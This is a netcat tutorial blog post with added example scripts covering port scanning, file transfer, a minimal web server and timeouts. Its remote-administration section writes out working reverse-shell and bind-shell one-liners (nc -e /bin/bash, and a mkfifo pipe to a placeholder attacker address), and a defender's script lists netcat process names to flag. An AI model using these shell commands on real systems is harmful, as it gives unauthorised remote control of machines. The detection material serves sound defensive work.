Netcat – Swiss Army Knife Pro Usage

29/12/2020
Uncategorized
Netcat is a utility for reading and writing data across TCP and UDP connections. It can be used for file transfer, port scanning, port redirection, leaving a backdoor on a machine, building a simple chat program, network troubleshooting and more, which is why it is known as the swiss army knife of networking. It ships pre-installed with almost every Linux distribution, and network administrators, DevOps and security engineers reach for it for small daily tasks.

A brief difference between netcat-traditional and netcat-openbsd

Debian and Ubuntu ship two netcat packages. They take the same basic syntax but differ in a few options, and their verbose messages look different, which you will notice in the outputs below.

netcat-traditional (the original "Hobbit" netcat 1.10) has the '-e' option, which runs a program (e.g. bash) with its standard input and output attached to the socket. This is what makes the remote-administration tricks below a one-liner, and also why this package is the one attackers prefer to find on a box.

netcat-openbsd has no '-e' option but adds IPv6 ('-6'), proxy support (SOCKS or HTTP CONNECT via '-X' and '-x') and Unix-domain sockets ('-U'). On Debian-based systems it is the default 'nc'; 'nc -h' shows which variant you have, and 'update-alternatives --config nc' switches between them when both are installed.

Netcat Installation

Netcat comes pre-installed in most Linux distributions; if it is missing, it can be installed with the following commands.

For traditional package,

ubuntu@ubuntu:~$ sudo apt-get install netcat-traditional

For openbsd version,

ubuntu@ubuntu:~$ sudo apt-get install netcat-openbsd

Netcat for Windows (a port of netcat 1.10, so it has the '-e' option) can be downloaded from https://sourceforge.net/projects/nc110/files/.

Now we’ll explore some interesting use cases of netcat

Port Scanning using netcat

To check whether a port is open, use the '-z' (zero-I/O) option: netcat completes the TCP handshake and closes the connection without sending any data. For UDP ('-u') there is no handshake, so netcat sends a small probe datagram and can only report a port as closed if an ICMP port-unreachable reply comes back; silence may mean open or filtered. Add '-v' to print the result of each attempt:

ubuntu@ubuntu:~$ nc -z -v hackme.org 80
…snip…
hackme.org [217.78.1.155] 80 (http) open

To scan a range of ports, give it as first-last. With '-n' netcat skips DNS and prints the address instead of a hostname; netcat-traditional walks the range from the highest port down, which is why 80 is listed before 22:

ubuntu@ubuntu:~$ nc -z -nv 192.168.100.72 20-80
(UNKNOWN) [192.168.100.72] 80 (http) open
(UNKNOWN) [192.168.100.72] 22 (ssh) open
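As an added example that is not part of the original article: the script below wraps "nc -z" into a small range scanner with a per-port connect timeout, and normalizes the verbose output of either Debian variant into uniform "port open" lines. The addresses and the sample output it parses are constructed placeholders, and it assumes a netcat that accepts -z, -n and -w (both netcat-traditional and netcat-openbsd do).

```shell
#!/bin/sh
# Added example, not from the original article. Two helpers around "nc -z":
#  - nc_scan:             scan a port range with a per-port connect timeout,
#                         relying on nc's exit status, which both Debian
#                         variants set the same way;
#  - normalize_nc_output: turn the verbose (-v) output of either variant
#                         into uniform "<port> open" lines.
# Hosts and addresses below are placeholders.

# nc_scan HOST FIRST LAST [TIMEOUT]
# One nc process per port, so a filtered port costs TIMEOUT seconds (default 1)
# instead of stalling the whole range. Prints "<port> open" or "<port> closed".
nc_scan() {
    host=$1; first=$2; last=$3; timeout=${4:-1}
    port=$first
    while [ "$port" -le "$last" ]; do
        # -z: zero-I/O (handshake only), -n: no DNS, -w: connect timeout
        if nc -z -n -w "$timeout" "$host" "$port" >/dev/null 2>&1; then
            echo "$port open"
        else
            echo "$port closed"
        fi
        port=$((port + 1))
    done
}

# normalize_nc_output < nc-stderr-text
# netcat-traditional reports "(UNKNOWN) [192.168.100.72] 80 (http) open",
# netcat-openbsd reports "Connection to 192.168.100.72 80 port [tcp/http] succeeded!";
# failure lines ("Connection refused", "timed out") are dropped.
normalize_nc_output() {
    awk '
        /\) open$/                    { print $(NF-2) " open"; next }   # traditional
        / port \[[^]]*\] succeeded!$/ { print $4 " open"; next }        # openbsd
    '
}

# Constructed sample of mixed verbose output (not a real capture), i.e. what
#   nc -z -nv 192.168.100.72 20-80 2> scan.log
# leaves in scan.log on one variant or the other.
SCAN_SAMPLE='(UNKNOWN) [192.168.100.72] 80 (http) open
(UNKNOWN) [192.168.100.72] 22 (ssh) open
Connection to 10.0.0.5 443 port [tcp/https] succeeded!
Connection to 10.0.0.5 8080 port [tcp/*] succeeded!
nc: connect to 10.0.0.5 port 21 (tcp) failed: Connection refused'

printf '%s\n' "$SCAN_SAMPLE" | normalize_nc_output
# Live use: nc_scan 192.168.100.72 20 80 2
```

nc_scan uses the exit status rather than the text, so it behaves the same whichever variant 'nc' resolves to; normalize_nc_output is for the case where you already have a saved verbose scan log and want it in a form that is easy to diff against an allow-list.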

File Transfer with netcat

Another common use of netcat is transferring files between two machines. Text and binary files work alike, since netcat copies bytes verbatim. As an example, we send "file.pdf" from a Linux PC to a Windows PC (IP 192.168.100.72). Start the receiver first, then the sender; the sender exits when it reaches the end of the file and closes the connection. If your netcat-openbsd build stays connected after the file has been sent, add '-N' (or '-q 1' on Debian builds) so it closes the socket on EOF. Netcat neither encrypts nor checks the data, so compare a checksum on both ends (sha256sum on Linux, certutil -hashfile on Windows) and remember that the listening port is open to anyone on the network until the transfer is done.

On Windows machine (receiver), type the following

C:\Users> nc -nvlp 1337 > file.pdf
Listening on [0.0.0.0] (family 2, port 1337)

On Linux machine (sender), type the following

ubuntu@ubuntu:~$ nc -nv 192.168.100.72 1337 < file.pdf
Connection to 192.168.100.72 1337 port [tcp/*] succeeded!

Remote Administration with netcat

One of the best-known uses of netcat is remote administration: driving a shell on another machine over a raw TCP connection. netcat-traditional's '-e' option starts a program (cmd.exe on Windows, bash or sh on Linux) with its standard input and output attached to the socket, so netcat acts as the go-between: commands typed on the remote side are executed locally and the output is sent back. The same feature is widely used for malicious purposes, to leave backdoors on PCs and servers. netcat-openbsd lacks '-e', but a small trick with a named pipe gives the same result. There are two ways to connect the shell to the other side.

In a reverse shell, the attacker listens on a port and the victim machine connects out to it. This is the usual choice when the victim is behind NAT or has no public IP, and it also works through most firewalls because outbound connections are rarely blocked.

To catch a reverse shell, listen on a port with netcat on the attacker machine:

ubuntu@ubuntu:~$ nc -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1337)

On the victim machine (if netcat-traditional is installed; [IP_ADDR] is the attacker's address)

//replace "/bin/bash" with "cmd.exe" in case of Windows

ubuntu@ubuntu:~$ nc -nv [IP_ADDR] 1337 -e /bin/bash

For netcat-openbsd (where the "-e" option isn't supported), the same effect comes from a named pipe: netcat writes whatever it receives into the FIFO, "cat" feeds that to an interactive shell, and the shell's output (with stderr merged into stdout) is piped into netcat's stdin and so travels back over the network. The FIFO is removed first in case a stale file with that name exists:

ubuntu@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [IP_ADDR] 1337 > /tmp/f

A bind shell is the reverse arrangement: netcat listens on the victim machine with the shell attached, and the attacker connects to that port. It is used when the attacker's machine is behind NAT or has no public IP, but it needs an inbound path to the victim, so host firewalls and NAT on the victim's side usually get in the way.

On victim machine, type

ubuntu@ubuntu:~$ nc -nlvp 1337 -e /bin/bash
listening on [any] 1337

Now connect to that port (here from the same machine, hence 127.0.0.1; use the victim's IP otherwise) and run commands. The shell runs with the privileges of whoever started netcat, in this case an account in the sudo group:

ubuntu@ubuntu:~$ nc -nv 127.0.0.1 1337
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
$ id
uid=1000(azad) gid=1000(azad) groups=1000(azad),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),118(lpadmin),129(sambashare)
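As a defender's check, and as an added example rather than something from the original article: both shells above leave a tell-tale entry in the socket table. The function below reads the output of "ss -tnap" and flags sockets owned by a netcat binary (a bind shell waiting for a client, or the FIFO variant where nc keeps the socket and the shell sits behind pipes) as well as established sockets owned directly by a shell, which is what netcat-traditional's "-e" produces because it execs the program in place. The sample output embedded in the block is constructed to match the shells above, and the column layout of "ss -tnap" is assumed to be the one shown.

```shell
#!/bin/sh
# Added example, not from the original article: a defender's check for the
# bind and reverse shells above, run over the output of "ss -tnap".
# Two things give a netcat shell away in the socket table:
#  - a LISTEN or ESTAB socket owned by a netcat binary (bind shell waiting,
#    or the FIFO variant, where nc keeps the socket and the shell sits
#    behind pipes);
#  - an ESTAB socket owned directly by a shell: netcat-traditional's "-e"
#    execs the program in place, so after the connection the shell itself
#    holds the socket as its stdin/stdout/stderr (fd=0,1,2 in the sample).
# The column layout of "ss -tnap" is assumed to be the one in the sample.

# flag_shell_sockets < ss-output  ->  "<state> <local> <peer> <process>"
flag_shell_sockets() {
    awk '
        $1 == "LISTEN" || $1 == "ESTAB" {
            name = ""
            if (match($0, /users:\(\("[^"]+"/))      # users:(("nc",pid=4242,fd=3))
                name = substr($0, RSTART + 9, RLENGTH - 10)
            is_nc    = (name ~ /^(nc|ncat|netcat|nc\.openbsd|nc\.traditional)$/)
            is_shell = (name ~ /^(sh|bash|dash|zsh)$/)
            if (is_nc || ($1 == "ESTAB" && is_shell))
                print $1, $4, $5, name
        }'
}

# Constructed sample (not a real capture): sshd as benign noise, a bind shell
# waiting on 1337, a "-e" reverse shell (bash owns the socket) and a FIFO
# reverse shell (nc owns the socket), both connected to an attacker on 4444.
SS_SAMPLE='State   Recv-Q  Send-Q  Local Address:Port    Peer Address:Port     Process
LISTEN  0       128     0.0.0.0:22            0.0.0.0:*             users:(("sshd",pid=812,fd=3))
LISTEN  0       1       0.0.0.0:1337          0.0.0.0:*             users:(("nc",pid=4242,fd=3))
ESTAB   0       0       192.168.100.72:22     192.168.100.10:51410  users:(("sshd",pid=900,fd=4))
ESTAB   0       0       192.168.100.72:51522  192.168.100.10:4444   users:(("bash",pid=4243,fd=0),("bash",pid=4243,fd=1),("bash",pid=4243,fd=2))
ESTAB   0       0       192.168.100.72:51530  192.168.100.10:4444   users:(("nc",pid=4400,fd=3))'

printf '%s\n' "$SS_SAMPLE" | flag_shell_sockets
# Live use: ss -tnap | flag_shell_sockets
```

A shell whose standard streams are a network socket has no legitimate reason to exist on a server, so the fd=0,1,2 pattern on the bash line is worth alerting on by itself; the netcat-owned sockets need a second look, since administrators do use nc for file transfers.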

Simple Web Server using netcat

Another trick is to use netcat as a minimal single-page web server. The loop below restarts netcat after every request and answers each with a fixed HTML page. HTTP needs CRLF line endings and a blank line between the headers and the body, and a Content-Length header lets the client know where the body ends instead of waiting for netcat to close the socket:

ubuntu@ubuntu:~$ body='<h1>My Simple Webserver using netcat</h1>'; while true; do printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n%s' "${#body}" "$body" | nc -nvlp 1337; done
Listening on [0.0.0.0] (family 2, port 1337)

Now, try to fetch the webpage using curl

ubuntu@ubuntu:~$ curl http://127.0.0.1:1337/
<h1>My Simple Webserver using netcat</h1>
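The one-liner works, but a real HTTP response is worth getting right. As an added example, not from the original article, the function below builds a response with CRLF line endings, a byte-accurate Content-Length and a "Connection: close" header, and the serve function restarts netcat after each client as the article's loop does. The page body and port are placeholders, and it assumes a Debian-style nc that accepts "-l -p PORT".

```shell
#!/bin/sh
# Added example, not from the original article: build a well-formed HTTP/1.1
# response for the netcat web server. The article's loop relies on the client
# to cope with a bare body; this version sends the headers a browser expects.

# http_response STATUS BODY -> prints the full response to stdout.
# Content-Length must be the byte count of the body, not the character count,
# so it is measured with "wc -c" rather than ${#body}, which counts characters
# in a UTF-8 locale and would truncate a body with non-ASCII text.
http_response() {
    status=$1; body=$2
    length=$(printf '%s' "$body" | wc -c | tr -d ' ')
    printf 'HTTP/1.1 %s\r\n' "$status"
    printf 'Content-Type: text/html; charset=utf-8\r\n'
    printf 'Content-Length: %s\r\n' "$length"
    printf 'Connection: close\r\n'
    printf '\r\n%s' "$body"
}

# serve PORT BODY: answer every connection with the same page.
# Content-Length plus "Connection: close" lets the client read the body and
# hang up; nc then exits and the loop starts a fresh listener for the next
# client. Listens on all interfaces like the article's nc -nvlp; to bind to
# localhost use "nc -l 127.0.0.1 PORT" (netcat-openbsd) or
# "nc -l -p PORT -s 127.0.0.1" (netcat-traditional).
serve() {
    port=$1; body=$2
    while :; do
        http_response "200 OK" "$body" | nc -n -l -p "$port"
    done
}

# Stand-alone run: print one response so the format can be inspected.
http_response "200 OK" "<h1>My Simple Webserver using netcat</h1>"
# Live use: serve 1337 '<h1>My Simple Webserver using netcat</h1>'
```

Test it with curl -i http://127.0.0.1:1337/ to see the headers; curl returns immediately once Content-Length bytes have arrived, which is the difference a client notices between this and the bare echo version.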

Specify Timeout for a netcat Session

The "-w" option takes a timeout in seconds. An outgoing connection that cannot be established within that time is abandoned, and netcat-openbsd also drops an established connection that stays idle for that long, so a scan or transfer against a silent host fails fast instead of hanging. The option belongs on the connecting side: on a listener ("-l") netcat-openbsd ignores "-w" and waits for a client indefinitely.

// -w [Time in Seconds]
ubuntu@ubuntu:~$ nc -w 5 -nv 192.168.100.72 1337

Continue Listening even if Client closes the Connection

Normally a netcat listener exits as soon as its client disconnects. netcat-openbsd's "-k" option keeps it listening and accepts the next client:

ubuntu@ubuntu:~$ nc -k -nlvp 1234
Listening on [0.0.0.0] (family 2, port 1234)

Two caveats: "-k" does not exist in netcat-traditional, where you restart the listener in a shell loop as in the web server example; and "-k" only reuses the listening socket, not the input. Anything piped into netcat's stdin is consumed by the first client, so later clients receive nothing from it.

Conclusion

Netcat is a simple yet efficient utility that covers a lot of small daily tasks. It comes pre-installed on almost every UNIX-like operating system and can be used for communication between two PCs, file transfers, port checks and more. Keep in mind that everything it sends travels in cleartext, and that a listener with a shell attached is exactly the backdoor attackers leave behind, so treat any unexpected netcat process on a server as something to investigate.
